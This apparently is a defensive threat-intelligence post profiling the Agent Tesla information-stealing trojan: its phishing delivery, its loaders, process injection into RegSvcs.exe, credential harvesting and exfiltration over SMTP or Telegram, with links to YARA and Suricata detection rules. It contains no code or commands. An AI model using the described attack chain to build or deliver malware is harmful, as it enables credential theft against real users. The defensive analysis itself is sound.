Agent Tesla

Posted May 23, 2025 Updated Mar 17, 2026

By Infinit3i

3 min read

Executive Summary

Agent Tesla is a remote access trojan (RAT) written in .NET that has been actively targeting users with Microsoft Windows OS-based systems since 2014. It is a versatile malware with a wide range of capabilities, including sensitive information stealing, keylogging, and screenshot capture. Since its release, this malicious software has received regular updates. It is sold as malware-as-a-service, with several subscription options available for purchase. Campaigns involving Agent Tesla often start with phishing emails, masquerading as legitimate messages from trusted sources.

Overview

Description

Type: Information-stealing Remote Access Trojan (RAT) sold as Malware-as-a-Service (MaaS)

Delivery:
Primarily distributed through phishing campaigns using malicious attachments such as .zip / .rar archives, malicious Office documents with macros, .img / .iso disk images, and .exe, .js, .vbs, or .lnk droppers. The payload is often delivered through multi-stage loaders such as GuLoader, Snake Keylogger loaders, .NET downloaders, and PowerShell download chains. Attachments frequently impersonate invoices, purchase orders, shipping notices, or financial documents.

Capabilities:
Credential harvesting from web browsers (Chrome, Firefox, Edge, Opera), email credential theft from clients such as Outlook and Thunderbird, FTP credential extraction, keylogging of user keystrokes, clipboard monitoring, screenshot capture, system reconnaissance (hostname, IP, OS version), data exfiltration via SMTP, FTP, HTTP, or Telegram APIs, and persistence via registry Run keys or startup folders. Stolen data is periodically transmitted to attacker-controlled infrastructure.

Notable Characteristics:
Written in .NET, making it easy to modify and recompile. Widely sold on underground forums as a subscription-based MaaS tool. Often delivered through commodity malware loaders. Heavy use of string obfuscation, Base64 encoding, and packing. Frequent variant churn due to builder kits used by different operators. Exfiltration frequently uses SMTP or Telegram bots, which helps evade traditional C2 detection.

Attack Flow

Flow

Phishing Email → Word Attachment → Embedded RTF / Excel Object → Macro Execution → PowerShell Download → .NET Loader → Process Injection (RegSvcs.exe / RegAsm.exe) → Agent Tesla Execution → Credential Harvesting → SMTP / HTTP Exfiltration

Victim receives an email impersonating invoices, shipping notices, or purchase orders
Email contains a Word document or archive containing the malicious file
Document loads an embedded RTF or Excel object that triggers macro execution
Macro launches PowerShell to retrieve a remote payload
A .NET loader, often GuLoader or similar, downloads and decrypts the Agent Tesla payload
The loader injects the payload into legitimate Windows processes such as RegSvcs.exe or RegAsm.exe
Malware begins credential harvesting and system reconnaissance
Stolen credentials and system data are transmitted to attacker infrastructure via SMTP, FTP, HTTP, or Telegram APIs

MITRE ATT&CK Techniques

MITRE ATT&CK

Detections

Detection Rules

Rule	View	Download
YARA	View	Download
Suricata	View	Download
SPL	View	Download

Research & References

References

Malware, Trojan

This post is licensed under CC BY 4.0 by the author.